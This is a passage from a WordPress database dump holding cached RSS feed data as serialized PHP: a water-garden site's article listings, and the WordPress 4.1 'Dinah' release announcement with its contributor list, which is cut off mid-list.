Pump\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"http://www.water-garden-guide.com/water-garden-pump.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"d0607ad36cf1d837b7d48941f860ee95\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"Most ponds incorporate the use of a water garden pump for recirculating the water and powering water falls and fountains.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 26 Feb 2008 17:17:10 -0500\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Water Garden Fountains\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"http://www.water-garden-guide.com/water-garden-fountains.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"1f471da90406a90bf263d5e5d038b001\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:143:\"Water garden fountains are a decorative addition to your landscape. You can choose a self contained water fountain or add a fountain to a pond.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 21 Dec 2007 08:44:22 -0500\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Garden Pond Designs - Fish\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://www.water-garden-guide.com/garden-pond-designs.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"8faf1acfe5f65cfd39676388cfba55b6\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"When coming up with your garden pond designs, you should also be planning for pond fish.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Dec 2007 00:06:47 -0500\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Water Garden Fish\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"http://www.water-garden-guide.com/water-garden-fish.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"0a0a94563dcd5b4edb525e9160004b19\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:108:\"Introducing water garden fish to your new pond may be the most exciting step in creating your new fish pond.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Dec 2007 15:58:45 -0500\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"Marginal Plants for Your Water Garden\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"http://www.water-garden-guide.com/marginal-plants.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"1dd680ebff604814c1143527b5963068\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"Marginal plants are typically found around the edges of water gardens. They prefer shallows and most varieties are perennial. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Dec 2007 15:50:50 -0500\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"Introducing Pond Fish to Your Water Garden\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://www.water-garden-guide.com/introducing-pond-fish.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"dd20c5fd7b316b6e40f101e217804ff2\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:119:\"Is your pond ready for fish? There are some important considerations before introducing pond fish to your water garden.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Dec 2007 15:49:13 -0500\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Garden Pond Design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://www.water-garden-guide.com/garden-pond-design.html\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"54a554d2a52b6f1fc3cef18566e91dcc\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"Proportion is a key element in garden pond design. The size of your water garden should be in scale with the rest of your landscape.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Dec 2007 15:47:59 -0500\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:4:\"date\";s:29:\"Thu, 05 Feb 2015 20:14:24 GMT\";s:6:\"server\";s:6:\"Apache\";s:13:\"last-modified\";s:29:\"Fri, 17 Aug 2012 05:24:57 GMT\";s:4:\"etag\";s:28:\"\"1d0e654-148c-4c76f6171fc40\"\";s:13:\"accept-ranges\";s:5:\"bytes\";s:14:\"content-length\";s:4:\"5260\";s:27:\"access-control-allow-origin\";s:27:\"http://sbiapps.sitesell.com\";s:32:\"access-control-allow-credentials\";s:4:\"true\";s:10:\"connection\";s:5:\"close\";s:12:\"content-type\";s:30:\"application/xml; charset=utf-8\";}s:5:\"build\";s:14:\"20130522182132\";}','no'),(743,'_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','1423563973','no'),(744,'_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 18:57:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"http://wordpress.org/?v=4.2-alpha-31390\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:42:\"\n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 4.1 “Dinah”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/news/2014/12/dinah/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/news/2014/12/dinah/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 18:35:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3386\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:360:\"Version 4.1 of WordPress, named “Dinah” in honor of jazz singer Dinah Washington, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style. Introducing Twenty Fifteen Our newest default theme, Twenty Fifteen, is […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:24552:\"<p>Version 4.1 of WordPress, named “Dinah” in honor of jazz singer <a href=\"http://wikipedia.org/wiki/Dinah_Washington\">Dinah Washington</a>, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style.</p>\n<hr />\n<h2 style=\"text-align: center\">Introducing Twenty Fifteen</h2>\n<p><img class=\"aligncenter size-large wp-image-3389\" src=\"https://wordpress.org/news/files/2014/12/2015-laptop-1024x533.png\" alt=\"2015-laptop\" width=\"692\" height=\"360\" /></p>\n<h3>Our newest default theme, Twenty Fifteen, is a blog-focused theme designed for clarity.</h3>\n<p><img class=\"alignright wp-image-3426 size-medium\" src=\"https://wordpress.org/news/files/2014/12/2015-phones-languages-small-300x250.png\" alt=\"\" width=\"300\" height=\"250\" />Twenty Fifteen has flawless language support, with help from <a href=\"https://www.google.com/get/noto/\">Google’s Noto font family</a>.</p>\n<p>The straightforward typography is readable on any screen size.</p>\n<p>Your content always takes center stage, whether viewed on a phone, tablet, laptop, or desktop computer.</p>\n<hr />\n<h2 style=\"text-align: center\">Distraction-free writing</h2>\n<p><img class=\"aligncenter size-large wp-image-3392\" src=\"https://wordpress.org/news/files/2014/12/dfw-screen-1024x614.png\" alt=\"dfw-screen\" width=\"692\" height=\"415\" /></p>\n<h3 style=\"text-align: center\"><em>Just write.</em></h3>\n<p>Sometimes, you just need to concentrate on putting your thoughts into words. Try turning on <strong>distraction-free writing mode</strong>. When you start typing, all the distractions will fade away, letting you focus solely on your writing. All your editing tools instantly return when you need them.</p>\n<hr />\n<h2 style=\"text-align: center\">The Finer Points</h2>\n<h5><strong><img class=\"alignleft wp-image-3405\" src=\"https://wordpress.org/news/files/2014/12/icon-language2.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Choose a language</h5>\n<p>Right now, WordPress 4.1 is already translated into over forty languages, with more always in progress. You can switch to any translation on the General Settings screen.</p>\n<h5><strong><img class=\"alignleft wp-image-3406\" src=\"https://wordpress.org/news/files/2014/12/icon-logout1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Log out everywhere</h5>\n<p>If you’ve ever worried you forgot to sign out from a shared computer, you can now go to your profile and log out everywhere.</p>\n<h5><strong><img class=\"alignleft wp-image-3407\" src=\"https://wordpress.org/news/files/2014/12/icon-vine1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Vine embeds</h5>\n<p>Embedding videos from Vine is as simple as pasting a URL onto its own line in a post. See the <a href=\"https://codex.wordpress.org/Embeds\">full list</a> of supported embeds.</p>\n<h5><strong><img class=\"alignleft wp-image-3408\" src=\"https://wordpress.org/news/files/2014/12/icon-recommended1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Plugin recommendations</h5>\n<p>The plugin installer suggests plugins for you to try. Recommendations are based on the plugins you and other users have installed.</p>\n<hr />\n<h2 style=\"text-align: center\">Under the Hood</h2>\n<h5>Complex Queries</h5>\n<p>Metadata, date, and term queries now support advanced conditional logic, like nested clauses and multiple operators — <code>A AND ( B OR C )</code>.</p>\n<h5>Customizer API</h5>\n<p>The customizer now supports conditionally showing panels and sections based on the page being previewed.</p>\n<h5><code><title></code> tags in themes</h5>\n<p><code>add_theme_support( \'title-tag\' )</code> tells WordPress to handle the complexities of document titles.</p>\n<h5>Developer Reference</h5>\n<p>Continued improvements to inline code documentation have made the <a href=\"https://developer.wordpress.org/reference/\">developer reference</a> more complete than ever.</p>\n<hr />\n<h2 style=\"text-align: center\">The Choir</h2>\n<p>This release was led by <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, with the help of these awesome folks. Check out some of their profiles while listening to Dinah Washington on the music service of your choice:</p>\n<a href=\"https://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/akumria\">akumria</a>, <a href=\"https://profiles.wordpress.org/xknown\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"https://profiles.wordpress.org/tellyworth\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/collinsinternet\">Allan Collins</a>, <a href=\"https://profiles.wordpress.org/momo360modena\">Amaury Balmer</a>, <a href=\"https://profiles.wordpress.org/amruta123b\">Amruta Bhosale</a>, <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andg\">Andrea Gandino</a>, <a href=\"https://profiles.wordpress.org/sumobi\">Andrew Munro (sumobi)</a>, <a href=\"https://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/andrewryno\">Andrew Ryno</a>, <a href=\"https://profiles.wordpress.org/rarst\">Andrey \"Rarst\" Savchenko</a>, <a href=\"https://profiles.wordpress.org/ankitgadertcampcom\">Ankit Gade</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/antpb\">antpb</a>, <a href=\"https://profiles.wordpress.org/arippberger\">arippberger</a>, <a href=\"https://profiles.wordpress.org/filosofo\">Austin Matzko</a>, <a href=\"https://profiles.wordpress.org/bainternet\">Bainternet</a>, <a href=\"https://profiles.wordpress.org/barrykooij\">Barry Kooij</a>, <a href=\"https://profiles.wordpress.org/empireoflight\">Ben Dunkle</a>, <a href=\"https://profiles.wordpress.org/benjmay\">Ben May</a>, <a href=\"https://profiles.wordpress.org/neoxx\">Bernhard Riedl</a>, <a href=\"https://profiles.wordpress.org/birgire\">Birgir Erlendsson (birgire)</a>, <a href=\"https://profiles.wordpress.org/bobbingwide\">bobbingwide</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">Boone B. Gorges</a>, <a href=\"https://profiles.wordpress.org/bradyvercher\">Brady Vercher</a>, <a href=\"https://profiles.wordpress.org/bramd\">Bram Duvigneau</a>, <a href=\"https://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/briandichiara\">Brian DiChiara</a>, <a href=\"https://profiles.wordpress.org/rzen\">Brian Richards</a>, <a href=\"https://profiles.wordpress.org/bswatson\">Brian Watson</a>, <a href=\"https://profiles.wordpress.org/camdensegal\">Camden Segal</a>, <a href=\"https://profiles.wordpress.org/captaintheme\">Captain Theme</a>, <a href=\"https://profiles.wordpress.org/hiwhatsup\">Carlos</a>, <a href=\"https://profiles.wordpress.org/caspie\">Caspie</a>, <a href=\"https://profiles.wordpress.org/ccprice\">ccprice</a>, <a href=\"https://profiles.wordpress.org/mackensen\">Charles Fulton</a>, <a href=\"https://profiles.wordpress.org/chrico\">ChriCo</a>, <a href=\"https://profiles.wordpress.org/aprea\">Chris Aprea</a>, <a href=\"https://profiles.wordpress.org/chrisbliss18\">Chris Jean</a>, <a href=\"https://profiles.wordpress.org/cmmarslender\">Chris Marslender</a>, <a href=\"https://profiles.wordpress.org/jazzs3quence\">Chris Reynolds</a>, <a href=\"https://profiles.wordpress.org/chriscct7\">chriscct7</a>, <a href=\"https://profiles.wordpress.org/chrisl27\">chrisl27</a>, <a href=\"https://profiles.wordpress.org/cfoellmann\">Christian Foellmann</a>, <a href=\"https://profiles.wordpress.org/cfinke\">Christopher Finke</a>, <a href=\"https://profiles.wordpress.org/cyclometh\">Corey Snow</a>, <a href=\"https://profiles.wordpress.org/corphi\">Corphi</a>, <a href=\"https://profiles.wordpress.org/curtjen\">curtjen</a>, <a href=\"https://profiles.wordpress.org/colorful-tones\">Damon Cook</a>, <a href=\"https://profiles.wordpress.org/dancameron\">Dan Cameron</a>, <a href=\"https://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"https://profiles.wordpress.org/convissor\">Daniel Convissor</a>, <a href=\"https://profiles.wordpress.org/nerrad\">Darren Ethier (nerrad)</a>, <a href=\"https://profiles.wordpress.org/koop\">Daryl Koopersmith</a>, <a href=\"https://profiles.wordpress.org/dmchale\">Dave McHale</a>, <a href=\"https://profiles.wordpress.org/davidakennedy\">David A. Kennedy</a>, <a href=\"https://profiles.wordpress.org/dlh\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/davidjlaietta\">David Laietta</a>, <a href=\"https://profiles.wordpress.org/technical_mastermind\">David Wood</a>, <a href=\"https://profiles.wordpress.org/davidthemachine\">DavidTheMachine</a>, <a href=\"https://profiles.wordpress.org/dcavins\">dcavins</a>, <a href=\"https://profiles.wordpress.org/realloc\">Dennis Ploetner</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/wedi\">Dirk Weise</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/dominikschwind-1\">Dominik Schwind</a>, <a href=\"https://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"https://profiles.wordpress.org/dustyf\">Dustin Filippini</a>, <a href=\"https://profiles.wordpress.org/dustinhartzler\">Dustin Hartzler</a>, <a href=\"https://profiles.wordpress.org/eliorivero\">Elio Rivero</a>, <a href=\"https://profiles.wordpress.org/ebinnion\">Eric Binnion</a>, <a href=\"https://profiles.wordpress.org/ew_holmes\">Eric Holmes</a>, <a href=\"https://profiles.wordpress.org/ericlewis\">Eric Lewis</a>, <a href=\"https://profiles.wordpress.org/fab1en\">Fabien Quatravaux</a>, <a href=\"https://profiles.wordpress.org/florianziegler\">Florian Ziegler</a>, <a href=\"https://profiles.wordpress.org/hereswhatidid\">Gabe Shackle</a>, <a href=\"https://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"https://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/soulseekah\">Gennady Kovshenin</a>, <a href=\"https://profiles.wordpress.org/babbardel\">George Olaru</a>, <a href=\"https://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"https://profiles.wordpress.org/gregrickaby\">Greg Rickaby</a>, <a href=\"https://profiles.wordpress.org/gcorne\">Gregory Cornelius</a>, <a href=\"https://profiles.wordpress.org/tivnet\">Gregory Karpinsky (@tivnet)</a>, <a href=\"https://profiles.wordpress.org/bordoni\">Gustavo Bordoni</a>, <a href=\"https://profiles.wordpress.org/hardy101\">hardy101</a>, <a href=\"https://profiles.wordpress.org/hauvong\">hauvong</a>, <a href=\"https://profiles.wordpress.org/helen\">Helen Hou-Sandí</a>, <a href=\"https://profiles.wordpress.org/heshiming\">heshiming</a>, <a href=\"https://profiles.wordpress.org/honeysilvas\">honeysilvas</a>, <a href=\"https://profiles.wordpress.org/hugodelgado\">hugodelgado</a>, <a href=\"https://profiles.wordpress.org/iandstewart\">Ian Stewart</a>, <a href=\"https://profiles.wordpress.org/ianmjones\">ianmjones</a>, <a href=\"https://profiles.wordpress.org/igmoweb\">Ignacio Cruz Moreno</a>, <a href=\"https://profiles.wordpress.org/imath\">imath</a>, <a href=\"https://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"https://profiles.wordpress.org/ivankristianto\">Ivan Kristianto</a>, <a href=\"https://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a>, <a 